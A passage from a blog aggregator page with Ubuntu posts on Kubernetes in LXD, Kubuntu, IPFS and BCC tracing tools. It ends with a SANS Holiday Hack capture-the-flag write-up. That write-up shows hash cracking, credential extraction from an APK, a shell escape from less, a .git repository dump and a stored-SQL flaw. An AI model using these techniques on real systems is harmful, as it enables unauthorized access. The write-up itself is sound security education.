lxc config device add kubernetes mem unix-char path=/dev/mem

Then we need to add a couple of PPAs and install conjure-up, the deployment tool we’ll use to get Kubernetes going.

lxc exec kubernetes -- apt-add-repository ppa:conjure-up/next -y
lxc exec kubernetes -- apt-add-repository ppa:juju/stable -y
lxc exec kubernetes -- apt update
lxc exec kubernetes -- apt dist-upgrade -y
lxc exec kubernetes -- apt install conjure-up -y

And the last setup step is to configure LXD networking inside the container.
Answer with the default for all questions, except for:

  • Use the “dir” storage backend (“zfs” doesn’t work in a nested container)
  • Do NOT configure IPv6 networking (conjure-up/juju don’t play well with it)

lxc exec kubernetes -- lxd init

And that’s it for the container configuration itself, now we can deploy Kubernetes!

Deploying Kubernetes with conjure-up

As mentioned earlier, we’ll be using conjure-up to deploy Kubernetes.
This is a nice, user friendly, tool that interfaces with Juju to deploy complex services.

Start it with:

lxc exec kubernetes -- sudo -u ubuntu -i conjure-up

  • Select “Kubernetes Core”
  • Then select “localhost” as the deployment target (uses LXD)
  • And hit “Deploy all remaining applications”

This will now deploy Kubernetes. The whole process can take well over an hour depending on what kind of machine you’re running this on. You’ll see all services getting a container allocated, then getting deployed and finally interconnected.

Once the deployment is done, a few post-install steps will appear. These will import some initial images, set up SSH authentication, configure networking and finally give you the IP address of the dashboard.

Interact with your new Kubernetes

We can ask Juju to deploy a new Kubernetes workload, in this case 5 instances of “microbot”:

ubuntu@kubernetes:~$ juju run-action kubernetes-worker/0 microbot replicas=5
Action queued with id: 1d1e2997-5238-4b86-873c-ad79660db43f

You can then grab the service address from the Juju action output:

ubuntu@kubernetes:~$ juju show-action-output 1d1e2997-5238-4b86-873c-ad79660db43f
results:
 address: microbot.10.97.218.226.xip.io
status: completed
timing:
 completed: 2017-01-13 10:26:14 +0000 UTC
 enqueued: 2017-01-13 10:26:11 +0000 UTC
 started: 2017-01-13 10:26:12 +0000 UTC

Now actually using the Kubernetes tools, we can check the state of our new pods:

ubuntu@kubernetes:~$ ./kubectl get pods
NAME READY STATUS RESTARTS AGE
default-http-backend-w9nr3 1/1 Running 0 21m
microbot-1855935831-cn4bs 0/1 ContainerCreating 0 18s
microbot-1855935831-dh70k 0/1 ContainerCreating 0 18s
microbot-1855935831-fqwjp 0/1 ContainerCreating 0 18s
microbot-1855935831-ksmmp 0/1 ContainerCreating 0 18s
microbot-1855935831-mfvst 1/1 Running 0 18s
nginx-ingress-controller-bj5gh 1/1 Running 0 21m

After a little while, you’ll see everything’s running:

ubuntu@kubernetes:~$ ./kubectl get pods
NAME READY STATUS RESTARTS AGE
default-http-backend-w9nr3 1/1 Running 0 23m
microbot-1855935831-cn4bs 1/1 Running 0 2m
microbot-1855935831-dh70k 1/1 Running 0 2m
microbot-1855935831-fqwjp 1/1 Running 0 2m
microbot-1855935831-ksmmp 1/1 Running 0 2m
microbot-1855935831-mfvst 1/1 Running 0 2m
nginx-ingress-controller-bj5gh 1/1 Running 0 23m

At which point, you can hit the service URL with:

ubuntu@kubernetes:~$ curl -s http://microbot.10.97.218.226.xip.io | grep hostname
 <p class="centered">Container hostname: microbot-1855935831-fqwjp</p>

Running this multiple times will show you different container hostnames as you get load balanced between one of those 5 new instances.
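
A quick sketch to watch the load balancing happen, reusing the service address from the action output above:

for i in 1 2 3 4 5; do
 curl -s http://microbot.10.97.218.226.xip.io | grep hostname
done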

Conclusion

As with OpenStack, conjure-up combined with LXD makes it very easy to deploy rather complex big software in a very self-contained way.

This isn’t the kind of setup you’d want to run in a production environment, but it’s great for developers, demos and whoever wants to try those technologies without investing into hardware.

Extra information

The conjure-up website can be found at: http://conjure-up.io
The Juju website can be found at: http://www.ubuntu.com/cloud/juju

The main LXD website is at: https://linuxcontainers.org/lxd
Development happens on Github at: https://github.com/lxc/lxd
Mailing-list support happens on: https://lists.linuxcontainers.org
IRC support happens in: #lxcontainers on irc.freenode.net
Try LXD online: https://linuxcontainers.org/lxd/try-it

on January 13, 2017 10:35 AM

January 10, 2017

Over the past few months our team has been working real hard on the Canonical Distribution of Kubernetes. This is a pure-upstream distribution of k8s with our community’s operational expertise bundled in.

It means that we can use one set of operational code to get the same deployment on GCE, AWS, Azure, Joyent, OpenStack, and Bare Metal.

Like most young distributed systems, Kubernetes isn’t exactly famous for its ease of use, though there has been tremendous progress over the past 12 months. Our documentation on Kubernetes was nearly non-existent, and it became obvious that we had to dive in there and bust it out. I’ve spent some time fixing it up, and it’s been recently merged.

You can find the Official Ubuntu Guides in the “Create a cluster” section. We’re taking what I call a “sig-cluster-lifecycle” approach to this documentation: the pages are organized into lifecycle topics based on what an operator would do, so “Backups” or “Upgrades” instead of one big page with sections. This will allow us to grow each section based on the expertise we learn on k8s for that given task.

Over the next few months (and hopefully for Kubernetes 1.6) we will slowly be phasing out the documentation on our individual charm and layer pages to reduce duplication and move to a pure upstream workflow.

On behalf of our team, we hope you enjoy Kubernetes. If you’re running into issues, please let us know, or you can find us in the Kubernetes Slack channels.

on January 10, 2017 07:34 PM

Welcome to the Ubuntu Weekly Newsletter. This is issue #494 for the week January 2 – 8, 2017, and the full version is available here.

In this issue we cover:

This issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution ShareAlike 3.0 License.

on January 10, 2017 04:06 PM

January 09, 2017

The Kubuntu Team announces the availability of Plasma 5.8.4 and KDE Frameworks 5.28.0 for Kubuntu 16.04 (Xenial) and 16.10 (Yakkety) through our Backports PPA.

Plasma 5.8.4 Announcement:
https://www.kde.org/announcements/plasma-5.8.4.php
How to get the update (in the commandline):

  1. sudo apt-add-repository ppa:kubuntu-ppa/backports
  2. sudo apt update
  3. sudo apt full-upgrade -y

If you have been testing this upgrade using the backports-landing PPA, please remove it before upgrading to backports. Do this on the command line:

sudo apt-add-repository --remove ppa:kubuntu-ppa/backports-landing

Please report any bugs you find on Launchpad (for packaging problems) and at http://bugs.kde.org for bugs in KDE software.

on January 09, 2017 08:01 PM

January 06, 2017

Happy new year Ubunteros and Ubunteras!

If you have been following our testing days, you will know by now that our intention is to get more people contributing to Ubuntu and free software projects, and to help them get started through testing and related tasks. So we will be making frequent calls for testing where you can contribute and learn. Educational AND fun ^_^

To start the year, I would like to invite you to test the IPFS candidate snap. IPFS is a really interesting free project for distributed storage. You can read more about it and watch a demo in the IPFS website.

We have pushed a nice snap with their latest stable version to the candidate channel in the store. But before we publish it to the stable channel we would like to get more people testing it.

You can get a clean and safe environment to test following some of the guides you'll find on the summaries of the past testing days.

Or, if you want to use your current system, you can just do:

$ sudo snap install ipfs --candidate

I have written a gist with a simple guide to get started testing it

If you finish that successfully and still have more time, or are curious about IPFS, please continue with an exploratory testing session. The idea here is just to execute random commands, try unusual inputs, and play around.

You can get ideas from the IPFS docs.
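
As a tiny exploratory sketch to get going (the hash below is the welcome readme that ships with IPFS; any IPFS path will do):

ipfs init
ipfs cat /ipfs/QmYwAPJzv5CZsnA625s3Xf2nemtYgPpHdWEz79ojWnPbdG/readme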

When you are done, please send me an email with your results and any comments. And if you get stuck or have any kind of question, please don't hesitate to ask. Remember that we welcome everybody.

on January 06, 2017 03:58 PM

January 05, 2017

The BPF Compiler Collection (BCC) is a toolkit for building kernel tracing tools that leverage the functionality provided by the Linux extended Berkeley Packet Filters (BPF).

BCC allows one to write BPF programs with front-ends in Python or Lua with kernel instrumentation written in C.  The instrumentation code is built into sandboxed eBPF byte code and is executed in the kernel.

The BCC github project README file provides an excellent overview and description of BCC and the various available BCC tools. Building BCC from scratch can be a bit time consuming; however, the good news is that the BCC tools are now available as a snap, so BCC can be quickly and easily installed using:

 sudo snap install --devmode bcc  

There are currently over 50 BCC tools in the snap, so let's have a quick look at a few:

cachetop allows one to view the top page cache hit/miss statistics. To run this use:

 sudo bcc.cachetop  



The funccount tool allows one to count the number of times specific functions get called.  For example, to see how many kernel functions with the name starting with "do_" get called per second one can use:

 sudo bcc.funccount "do_*" -i 1  


To see how to use all the options in this tool, use the -h option:

 sudo bcc.funccount -h  

I've found the funccount tool to be especially useful for checking kernel activity by counting hits on specific function names.
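
For instance, to watch VFS activity, counting hits per second on every kernel function starting with "vfs_" (just one pattern among many you could try):

 sudo bcc.funccount "vfs_*" -i 1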

The slabratetop tool is useful to see the active kernel SLAB/SLUB memory allocation rates:

 sudo bcc.slabratetop  


If you want to see which process is opening specific files, you can snoop on open system calls using the opensnoop tool:

 sudo bcc.opensnoop -T


Hopefully this gives you a taste of the useful tools available in BCC (I have barely scratched the surface in this article). I recommend installing the snap and giving it a try.
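If you're curious what else is included, every tool in the snap shows up as a bcc.* command, and two more standard BCC tools worth trying (assuming this snap ships them) are execsnoop and biolatency:

 ls /snap/bin/ | grep '^bcc\.'    # list every tool the snap exposes
 sudo bcc.execsnoop               # trace new processes as they are executed
 sudo bcc.biolatency              # summarize block I/O latency as a histogram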

As it stands, BCC provides a useful mechanism to develop BPF tracing tools, and I look forward to regularly updating the BCC snap as more tools are added to BCC. Kudos to Brendan Gregg for BCC!
on January 05, 2017 03:21 PM

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links
OGG
MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing?

  • Aaron
    • Kicking Rick’s merges to the curb
    • Kubuntu Manual / Documentation
  • Rick
    • Kubuntu Party
    • Kubuntu Dojo
    • Kubuntu Manual / Documentation
  • Ovidiu
    • Projects
    • Dockerising Open Source Applications (ReviewBoard, AgileFant, FixMyStreet)
    • Adding Images to Feedburner

      Sponsor: Big Blue Button


Those of you who have attended the Kubuntu parties will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org; go check out their project.

Kubuntu News

Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus

Sponsor: Linode



Linode, an awesome VPS with super-fast SSDs, fast data connections, and top-notch support. We have worked out a sponsorship for a server to build packages quicker and get them to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback

  • Linode server – LXD containers for others to use
    • Container 1 is being used by one of the packagers
    • Container 2 is a KCI slave node
    • With this resource we can build one dependency tree level at a time, which is around 100 packages and takes around 1 hour on average.
    • There is also enough capacity left that we can provide additional containers for Ninjas to use for packaging.
  • For Yakkety, we now have Qt 5.6.1, Frameworks and Plasma 5.7.2, and Applications 16.04.3 is almost done; we're looking for testers. The team is looking forward to Applications 16.08, and is hoping for an upstream release to get the PIM packages.
  • For Xenial, Plasma 5.7.2 has moved a little further forward, but there is much to be done in backports to achieve this.
  • Kubuntu CI System – Yofel has been working hard on improving the CI system, in addition to adding Slave Nodes, thanks to Linode too.
    • The next stage was to get the build jobs in order. This has meant we have dropped 32-bit builds from the CI, but we'll continue to provide x86 32-bit builds of Kubuntu. Focusing only on 64-bit builds has resolved many errors and failures.
    • They did run into an interesting error, where the Linode slave was so powerful that it tried to open 20 concurrent connections to the KDE Git repo, and was promptly cut off by the 5-connection limit. A nice problem to have.
  • Yofel will continue to work on the stable CI builds by getting a set of working configurations. The move back to Launchpad brings many benefits, but right now it's created a lot of challenges that the team are working through.
  • 2 additional Ninjas have been added to the team:
    • Rik Mills
    • Simon Quigley
  • Clivejo gave a big shout out to the 2 new Ninjas; many thanks for their excellent work and effort.
  • As always, we're desperate for testing of daily and beta builds of Yakkety.
  • Bug Crush Sprint required http://qa.kubuntu.co.uk/

In Show Notes

Rick doing GOOD STUFF: http://picosong.com/Dk8m/

Outro

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

on January 05, 2017 08:21 AM

Kubuntu Podcast 17

Kubuntu Podcast News

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links

OGG

MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing?

  • Aaron
    • Getting ready for Hurricane Matthew in Florida
  • Rick
    • ???
  • Ovidiu
    • ???

Sponsor: Big Blue Button


Those of you who have attended the Kubuntu parties will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org; go check out their project.

Kubuntu News

Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus

Sponsor: Linode


Linode, an awesome VPS with super-fast SSDs, fast data connections, and top-notch support. We have worked out a sponsorship for a server to build packages quicker and get them to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback

  • Clive became a Kubuntu Developer!!!

Game On 

  • The Linux Gamer interview

Questions about Gaming on Linux:

  1. Who are you and what do you do?
  2. What makes a Game developer want to bring their AAA game to Linux?
  3. Have stores like Humble Bundle and Indie Gala helped Linux gaming?
  4. Are Linux graphics drivers getting better?
  5. What are your thoughts on Vulkan?

TLG YouTube: https://www.youtube.com/user/tuxreviews

TLG Patreon: https://www.patreon.com/thelinuxgamer

Listener Feedback

  • From: Snowhog @ https://www.kubuntuforums.net/

    I just want to express my thanks for all the hard work developers and testers put into the Kubuntu/KDE/Plasma projects. So few of you; so many of us, and the “us’s” always seem to want ‘more’, and tend to, more often than not, complain about what isn’t included and what isn’t working instead of praising that which is and does.

    For me, and with very few exceptions since I first started using Kubuntu in 2007, Kubuntu has simply just worked. I am constantly amazed that such a robust and feature filled operating system is available to everyone for free (free to me). The developers and testers simply don’t receive the credit and gratitude you all have earned.

    So, again, from one of the “us’s”, THANK YOU!

    Please feel free to pass this along.

Contact Us

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

on January 05, 2017 08:02 AM

Introduction

This is my second time playing the SANS holiday hack challenge. It was a lot of fun, and probably took me about 8-10 hours over a period of 2-3 days, not including this writeup. Ironically, this writeup took me longer than actually completing the challenge – which brings me to a note about some of the examples in the writeup. Please ignore any dates or timelines you might see in screengrabs and other notes – I was so engrossed in playing that I did a terrible job of documenting as I went along, so a lot of these I went back and did a 2nd time (of course, knowing the solution made it a bit easier) so I could provide the quality of writeup I was hoping to.

Most importantly, a huge shout out to all the SANS Counter Hack guys – I can only imagine how much work goes into building an educational game like this and making the challenges realistic and engrossing. I’ve built wargames & similar apps for work, but never had to build them into a story – let alone a story that spans multiple years. I tip my hat to their dedication and success!

Part 1: A Most Curious Business Card

We start with the Dosis children again (I can’t read that name without thinking about DOCSIS, but I see no cable modems here…) who have found Santa’s bag and business card, signs of a struggle, but no Santa!

Looking at the business card, we see that Santa seems to be into extensive social media use. On his twitter account, we see a large number of posts (350), mostly composed of Christmas-themed words (JOY, PEACEONEARTH, etc.), but occasionally with a number of symbols in the center. At first I thought it might be some kind of encoding, so I decided to download the tweets to a file and examine them as plaintext. I did this with a bit of javascript to pull the right elements into a single file. I was about to start trying various decoding techniques when I happened to notice a pattern.

Well, perhaps the hidden message is “BUG BOUNTY”. (Question #1) I’m not sure what to do with it at this point, but perhaps it will become clear later.

Let’s switch to instagram and take a look there. The first two photos appear unremarkable, but the third one is cluttered with potential clues. One of Santa’s elves (Hermey) is apparently as good at keeping a clean desk as I am – just ask my coworkers! Fortunately they don’t Instagram shame me. :)

Using our “enhance” button from the local crime-solving TV show, we find a couple of clues.

We have a domain (or at least part of one) from an nmap report, and a filename. I wonder if they go together: https://www.northpolewonderland.com/SantaGram_4.2.zip. Indeed they do, and we have a zip file. Unzipping it, we discover it’s encrypted. Unsure what else to try, I try variations of “BUG BOUNTY” from Twitter, and one works. (Turns out the password is lower case, though.) Inside the zip file, we find an APK for SantaGram with SHA-1 78f950e8553765d4ccb39c30df7c437ac651d0d3. (Question #2)
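In command form, that works out to roughly the following (a sketch; the password is the lowercased Twitter message):

% unzip -P bugbounty SantaGram_4.2.zip
% sha1sum SantaGram_4.2.apk    # 78f950e8553765d4ccb39c30df7c437ac651d0d3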

Part 2: Awesome Package Konveyance

With the APK in hand, we decide to start hunting for interesting artifacts inside. With a simple apktool d, we extract all the files inside, resulting in resources, smali code, and a handful of other files. Hunting for usernames and passwords, I decide to use ack (http://beyondgrep.com/), a grep-like tool with some enhanced features. A quick search for the strings username and password reveals a number of potential options. I could check each manually, but, well, I’m lazy. Instead, I use ack -A 5, which shows 5 lines of context after each match. Paging through these results, I spot a likely candidate.
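For reference, the extraction and search amount to something like this (a sketch; the output directory name is hypothetical):

% apktool d SantaGram_4.2.apk -o santagram    # decode resources and smali code
% ack -i -A 5 'username|password' santagram/smali/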

Inside the same smali file, I find a password a few lines further down:

:try_start_0
const-string v1, "username"
const-string v2, "guest"
invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
const-string v1, "password"
const-string v2, "busyreindeer78"

Now we have a username and password pair: guest:busyreindeer78. (Question #3) Cool. I don’t know what they’re good for, but collecting credentials can always come in handy later.

An audio file is mentioned. I don’t know if it’s embedded in source, a resource by itself, or what, but I’m going to take a guess that it’s a large file. Find is useful in these cases:

% find . -size +100k               
./smali/android/support/v7/widget/StaggeredGridLayoutManager.smali
./smali/android/support/v7/widget/ao.smali
./smali/android/support/v7/widget/Toolbar.smali
./smali/android/support/v7/widget/LinearLayoutManager.smali
./smali/android/support/v7/a/l.smali
./smali/android/support/v4/b/s.smali
./smali/android/support/v4/widget/NestedScrollView.smali
./smali/android/support/design/widget/CoordinatorLayout.smali
./smali/com/parse/ParseObject.smali
./res/drawable/launch_screen.png
./res/drawable/demo_img.jpg
./res/raw/discombobulatedaudio1.mp3

There are quite a few more files than I expected in the relevant size range, but it’s easy to find the MP3 file in the bunch with just a glance. I guess the name of the audio file is discombobulatedaudio1.mp3. (Question #4.)

Part 3: A Fresh-Baked Holiday Pi

After running around for a while, hunting for pieces of the Cranberry Pi, I’m able to put the pieces together, and the helpful Holly Evergreen provides a link to the Cranberry Pi image.

After downloading the image, I’m able to map the partitions (using a great tool named kpartx) and mount the filesystem, then extract the password hash.

% sudo kpartx -av ./cranbian-jessie.img
add map loop3p1 (254:7): 0 129024 linear 7:3 8192
add map loop3p2 (254:8): 0 2576384 linear 7:3 137216
% sudo mount /dev/mapper/loop3p2 data
% sudo grep cranpi data/etc/shadow
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

This is a standard Unix sha-512 hash – slow, but workable. Fortunately, Minty Candycane of Rudolph’s Red Team has helped us out there by pointing to John the Ripper and the RockYou password list. (Shout out to @iagox86 for hosting the best collection of password lists around.)

Throwing the hash up on a virtual machine with a few cores and running john with the rockyou list for a little while, we discover Santa’s top secret password: yummycookies. (Question #5) After we let Holly Evergreen know that we’ve found the password, she tells us that we’ll be able to use the terminals around the North Pole to unlock the doors. Time to head to the terminals.
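The cracking step itself is essentially a one-liner (a sketch, with a hypothetical file name):

% john --wordlist=rockyou.txt hash.txt    # hash.txt holds the cranpi line from /etc/shadow
% john --show hash.txt                    # cranpi:yummycookies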

Terminal: Elf House #2

The first door I ran to is Elf House #2. Opening the terminal, we’re told to find the password in the /out.pcap file, but we’re running as the user scratchy, and the user itchy owns the file. After spending some time over-thinking the problem, I run sudo -l to see if I can run anything as root or itchy, and discover some useful tools:

(itchy) NOPASSWD: /usr/sbin/tcpdump
(itchy) NOPASSWD: /usr/bin/strings

Like any good hacker, I go straight to strings and discover the first part of the password:

sudo -u itchy /usr/bin/strings /out.pcap
…
<input type="hidden" name="part1" value="santasli" />
…

I played around with tcpdump to try to extract the second part as a file, but could never reconstruct anything meaningful. I thought about exfiltrating the file to my local box for Wireshark, but I wanted to solve it using only the tools I had available to me. I look at my options with tcpdump and try the -A flag (giving ASCII output) to see what I can see. Paging through it, I noticed an area containing the string “part2”, but only in every other character. I gave strings another try, this time checking for little-endian UTF-16 characters:

sudo -u itchy /usr/bin/strings -e l /out.pcap
part2:ttlehelper

Putting the parts together, we have “santaslittlehelper” and we’re in!

Terminal: Workshop

The first of two doors in the workshop is up the candy-cane striped stairs.

The challenge here is simple: find the password in the deeply nested directory structure. I decided to see what files existed at all with a quick find:

$ find . -type f
./.bashrc
./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt
./.profile
./.bash_logout

That was easy, but I suppose we need the contents. I don’t want to deal with all the special characters and directories (remember, I’m lazy) so I just let find do the work for me:

$ find . -type f -name 'key*' -exec cat {} \;
key: open_sesame

This leads us into Santa’s office, which presents us with another terminal on the back wall.

Terminal: Santa’s Office

As I said, we’re in Santa’s office with another terminal on the back wall, but no obvious door. It turns out the bookcase there is the hidden door!

Getting back to the terminal, I’m prompted with GREETINGS PROFESSOR FALKEN. Immediately, I recognize this as a line from the WOPR in the movie WarGames. After a few errant entries, I realize it wants me to dialog with it in exactly the same way as the movie. (This was a painstaking exercise in transcribing YouTube.)

GREETINGS PROFESSOR FALKEN.
Hello.
HOW ARE YOU FEELING TODAY?
I'm fine. How are you?
EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?
People sometimes make mistakes.
YES THEY DO. SHALL WE PLAY A GAME?
Love to. How about Global Thermonuclear War?
WOULDN'T YOU PREFER A GOOD GAME OF CHESS?
Later. Let's play Global Thermonuclear War.
FINE
,------~~v,_         _                     _--^\
 |'          \   ,__/ ||                 _/    /,_ _
/             \,/     /         ,,  _,,/^         v v-___
|                    /          |'~^                     \
\                   |         _/                     _ _/^
 \                 /         /                   ,~~^/ | 
  ^~~_       _ _   /          |          __,, _v__\   \/
      '~~,  , ~ \ \           ^~       /    ~   //
          \/     \/             \~,  ,/          
                                   ~~
   UNITED STATES                   SOVIET UNION
WHICH SIDE DO YOU WANT?
     1.    UNITED STATES
     2.    SOVIET UNION
PLEASE CHOOSE ONE: 2
AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME: 
Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: 
LOOK AT THE PRETTY LIGHTS

That was painful, but not difficult. It was incredibly unforgiving when it comes to typos; even a single extra space would require retyping the sentence (though fortunately not the whole transaction).

Through the door, we find ourselves in “The Corridor” with another locked door, but this time, no terminal. I tried a few obvious passwords anyway, but had no luck with that.

Terminal: Workshop (Reindeer)

There’s a second door in the workshop, next to a few of Santa’s reindeer. (If anyone figures out whether reindeer really moo, please let me know…)

Find the passphrase from the wumpus. Play fair or cheat; it's up to you.

I was going to cheat, but first I wanted to get the lay of the game, so I wandered a bit and fired a few arrows, and happened to hit the wumpus – no cheating necessary! (I’m not sure if randomly playing is “playing fair”, but hacking is about what works!)

Move or shoot? (m-s) s 6
*thwock!* *groan* *crash*
A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game!  You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!
Passphrase:
WUMPUS IS MISUNDERSTOOD

Terminal: Workshop - Train Station

On the train, there’s another terminal. It proclaims itself to be the Train Management Console: AUTHORIZED USERS ONLY. Running a few commands, I soon discovered that BRAKEOFF works, but START requires a password, which I don’t have. Looking at the HELP documentation, I noticed something odd:

Help Document for the Train
**STATUS** option will show you the current state of the train (brakes, boiler, boiler temp, coal level)
**BRAKEON** option enables the brakes.  Brakes should be enabled at every stop and while the train is not in use. 
**BRAKEOFF** option disables the brakes.  Brakes must be disabled before the **START** command will execute.
**START** option will start the train if the brake is released and the user has the correct password.
**HELP** brings you to this file.  If it's not here, this console cannot do it, unLESS you know something I don't.

It seemed strange that unLESS had the unusual capitalization, but then I realized the help document was probably being displayed with GNU less. Did it have shell functionality, similar to vim and other editors? The more-or-less universal command to start a shell is a bang (!), so I decided to give it a try, and was dropped into a shell. At first I thought about looking for the password (and you can discover it), but then I realized I could just run ActivateTrain directly.
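In practice the escape looks something like this (a sketch; in GNU less, a bare ! with no command starts an interactive shell, and the program path here is a guess):

!                    # typed at the less prompt: drop to a shell
$ ./ActivateTrain    # start the train directly, no password needed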

It turns out the train is a time machine to 1978. (I wonder if that’s related to the guest password we found earlier – busyreindeer78. Guess we’ll find out soon.)

1978: Finding Santa

So I arrived in 1978 and quite frankly, had no idea what I should do. I still needed more NetWars challenge coins (man, what I wouldn’t give for a real-life NetWars challenge coin, but since I’ve never been to a NetWars event, my trophy case remains empty), so I decided to wander and find whatever I found. Guess what I found? Santa! He was in the DFER (Dungeon for Errant Reindeer), but could not remember how he got there.

Part 4: My Gosh… It’s Full of Holes

If we use ack again to find URLs containing “northpolewonderland.com” (which was just a bit of a guess from seeing one or two of these URLs when looking for credentials), we find a number of candidate URLs:

% ack -o "[a-z]+\.northpolewonderland\.com"
values/strings.xml
24:analytics.northpolewonderland.com
25:analytics.northpolewonderland.com
29:ads.northpolewonderland.com
32:dev.northpolewonderland.com
34:dungeon.northpolewonderland.com
35:ex.northpolewonderland.com

We can then retrieve the IP addresses for each of these hosts using our trusty DNS tool dig:

% dig +short {ads,analytics,dev,dungeon,ex}.northpolewonderland.com
104.198.221.240
104.198.252.157
35.184.63.245
35.184.47.139
104.154.196.33

Taking each of these IPs to our trusty Tom Hessman, we find that each of them is in scope for our testing, but we are advised to keep our traffic reasonable.

analytics.northpolewonderland.com

I started by doing a quick NMAP scan of the host – it’s good to know what’s running on a machine, and sometimes you can reveal some interesting info with the default set of scripts. In fact, that turned out to be extremely handy in this particular case:

% nmap -F -sC analytics.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org )
Nmap scan report for analytics.northpolewonderland.com (104.198.252.157)
Host is up (0.065s latency).
rDNS record for 104.198.252.157: 157.252.198.104.bc.googleusercontent.com
Not shown: 98 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey: 
|   1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
|   2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
|_  256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open  https
| http-git: 
|   104.198.252.157:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Finishing touches (style, css, etc) 
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
| ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Subject Alternative Name: DNS:analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after:  2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|_  http/1.1

You’ll notice that the nmap http-git script was successful in this case. This is a not-uncommon finding when developers use git to deploy an application directly to the document root (very common in the case of PHP applications, which is likely the case here due to the redirect to ‘login.php’). This is great, because we can download the entire git repository, which will allow us to look for secrets, credentials, hidden handlers, or at least better understand the application.

Now, it’s not possible to directly clone this over http because nobody ran git update-server-info, as they weren’t intending to share this over the network. But that’s okay with directory indexing enabled: we can just mirror all the files with wget, then clone out a working repository:

% wget --mirror https://analytics.northpolewonderland.com/.git
…
Downloaded: 314 files, 1003K in 0.4s (2.68 MB/s)
% git clone analytics.northpolewonderland.com/.git analytics
Cloning into 'analytics'...
done.

Looking at the source, we find a few interesting files (given that we know an audio file is at least one of our goals): there’s a getaudio.php that returns a download of an mp3 file from the database (storing the whole MP3 in a database column isn’t the design choice I would have made, but I suppose I’ll be discovering a lot of design choices I wouldn’t have made). It’s noteworthy that the only user it will allow to download a file is the user guest. I decided to try logging in with the credentials we found in the app earlier (guest:busyreindeer78), and was straight in. Conveniently, the top of the page has a link labeled “MP3”, and a click later we have discombobulatedaudio2.mp3.

That was easy, but I have reason to believe we’re not done here – if for no reason other than the fact that there are 2 references to the analytics server in the challenge description. There’s also quite a bit of functionality we haven’t tried out yet. I spent a few minutes reviewing the SQL queries in the application. They’re not parameterized queries (again, differing design decisions) but the liberal use of mysqli_real_escape_string seems to prevent any obvious SQL injection.

One notable feature is the ability to save analytics reports. It’s particularly notable that the way in which they are saved is by storing the final SQL query in a column of the reports table. There’s also an ‘edit’ function for these saved queries, which seems to be designed just for renaming the saved reports, but if we look at the code, we easily see that we can edit any column stored in the database, including the stored SQL query. I’m honestly not sure what the right term is for this vulnerability (SQL injection implies injecting into an existing query, after all), but it’s clearly a vulnerability that will let us read arbitrary data from the database – including the stored MP3s, assuming we can access the edit functionality.

Code allowing any column to be updated:

$row = mysqli_fetch_assoc($result);
# Update the row with the new values
$set = [];
foreach($row as $name => $value) {
  print "Checking for " . htmlentities($name) . "...<br>";
  if(isset($_GET[$name])) {
    print 'Yup!<br>';
    $set[] = "$name='".mysqli_real_escape_string($db, $_GET[$name])."'";
  }
}

This edit function is allegedly restricted to not allow any users access:

(edit.php)

# Don't allow anybody to access this page (yet!)
restrict_page_to_users($db, []);

However, if we investigate the restrict_page_to_users function, we find that it calls check_access from db.php, which contains this code:

(db.php)

